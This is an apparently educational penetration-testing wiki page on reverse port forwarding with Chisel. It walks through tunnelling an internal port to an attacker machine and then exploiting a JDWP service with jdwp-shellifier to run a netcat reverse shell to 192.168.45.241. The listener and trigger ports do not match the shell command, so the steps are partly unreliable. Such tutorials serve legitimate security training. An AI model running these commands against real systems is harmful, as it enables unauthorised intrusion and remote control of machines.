Zero Day Archives
  • What is Zero Day Archives?
  • Contributors
  • Wireless Security
    • Intro to WiFi Pentesting
      • WEP Networks
      • WPS
      • WPA-PSK Networks
      • WPA & WPA2 PSK
      • WPA2 & WPA3 Enterprise Networks
      • WPA2 & WPA3-APLess
  • Reverse Engineering
    • Reverse Engineering
      • Introduction to Software Reverse Engineering
        • Introduction to Capture the Flag (CTF) Competitions
        • What are PE & Elf Binaries
        • Assembly Language for Beginner Reverse Engineers
        • Memory Registers for x86-64 (64-bit) and x86 (32-bit)
        • Reversing Tools: Command-Line Utilities for Binary Analysis
        • Reversing ELF Binaries: Techniques and Tools
      • Disassembly & Debugging
        • GDB for Reverse Engineering
        • RADARE2 for Reverse Engineering
        • GHIDRA for Reverse Engineering
        • IDA Pro for Reverse Engineering
      • Binary Exploitation
        • Buffer Overflows
          • What are Buffer Overflows and Stack Protections?
          • Commonly Exploited C Functions and Their Secure Alternatives
          • Basic Buffer Overflow in x86-64 Using GDB
        • Cryptography
          • Understanding Ciphers and Identifying Common Patterns
          • Teaching XOR Operations in Binary Exploitation
        • Return Oriented Programming (ROP)
          • Practical Guide to Exploring and Identifying Return-Oriented Programming (ROP)
        • Cracking and Patching Binaries
          • Tactics, Tools, and Procedures for Cracking and Patching Binaries
        • Ret2Win Challenges
  • Malware Analysis
    • Malware Analysis
      • Static Analysis
  • Transporting Files to/from Victims
    • Transferring Files to/from High Value Targets
      • Linux
      • Windows
      • CrackMapExec (NetExec)
  • Penetration Testing against GIT Remote Repositories
    • Targeting GIT Repositories
      • Attacking GIT
  • Network Pivoting, Port Forwarding, and Tunneling
    • Pivoting
      • Ligolo-ng
        • Basic Pivoting
        • Setup Reverse Shells through Pivot
        • Transferring Files through Pivot
      • Pivoting: Using Remote Desktop
      • ProxyChains
      • Metasploit
    • SSH Tunneling
      • SSH Local Port Forwarding
      • SSH Dynamic Port Forwarding
      • Sshuttle over SSH
    • Port Fowarding
      • Chisel Port Forwarding
      • NetSH for Port Forwarding
      • Plink for Port Forwarding
      • SoCat
      • Metasploit: Port Forwarding
  • Anti-Virus Evasion
    • Anti-Virus Evasion
      • Evasion with Metasploit
      • Evasion wtih Shellter
      • Evasion with Virus Total
  • Public Exploit Research
    • Online Exploit Research & Methods
  • Password Attacks
    • Password Attacks
      • Identifying Hashes
        • Hash Identifier Tools
      • John The Ripper
        • Cracking Passwords with John
        • Convert to Hashes with John
        • NTLM vs NTLMv2 Hashes + CrackMapExec
      • Hashcat
        • Cracking Passwords with Hashcat
      • Hydra
        • Hydra for Network Services
        • Hydra for Web Services
      • Mutating Wordlists for John & Hashcat
        • Mutating Wordlists
  • Digital Forensics & Incident Response (DFIR)
    • Digital Forensics
  • Data Science
    • Data Science/AI
  • Software Defined Radio (SDR)
    • Software Defined Radio
  • Embedded Systems Programming
    • Field Programmable Gate Arrays (FPGAs)
  • Other Resources
    • Resources for Hackers
Powered by GitBook
On this page
  • Port Forwarding with Chisel:
  • Setting Up a Port Forward with Chisel
  • Using the Port Forward for Exploitation
  1. Network Pivoting, Port Forwarding, and Tunneling
  2. Port Fowarding

Chisel Port Forwarding

PreviousPort FowardingNextNetSH for Port Forwarding

Last updated 2 months ago

Port Forwarding with Chisel:

When performing internal network enumeration, it's crucial to identify services running on various ports. In this case, we discovered a service running on port 8000 using the ss command:

ss -ntplu

This command lists all active listening ports along with associated processes, helping us pinpoint the internal service.

Setting Up a Port Forward with Chisel

To access the internal service remotely, we can set up a port forward using , a TCP/UDP tunneling tool that supports reverse port forwarding. This allows us to forward port 8000 from the target machine to our attack machine.

Step 1: Start the Chisel Server on the Attacker Machine

On our attacking machine, we start a Chisel server that listens on port 9000:

chisel server -p 9000 --reverse

Step 2: Start the Chisel Client on the Target Machine

On the target machine, we run the following command to establish a reverse tunnel, forwarding port 8000 to our attacking machine:

./chisel client --max-retry-count 1 192.168.45.241:9000 R:8000:127.0.0.1:8000

This command connects the target machine to our Chisel server and forwards port 8000 to our local system.

Using the Port Forward for Exploitation

Now that port 8000 is accessible from our attacking machine, we can utilize it for exploitation. For example, if the service running on port 8000 is a Java Debug Wire Protocol (JDWP) instance, we can use jdwp-shellifier.py to execute commands remotely:

python2 jdwp-shellifier.py -t 127.0.0.1 -p 8000 --cmd "busybox nc 192.168.45.241 3333 -e /bin/bash"

Step 3: Set Up a Listener for the Reverse Shell

Before triggering the exploit, we set up a netcat listener on our attack machine to catch the reverse shell:

nc -nvlp 2222

Step 4: Trigger the Reverse Shell on the Target

To initiate the shell connection, we trigger an event on the target machine:

nc 127.0.0.1 5000

Once executed, this should provide us with a remote shell, allowing further exploitation and post-exploitation activities.

Chisel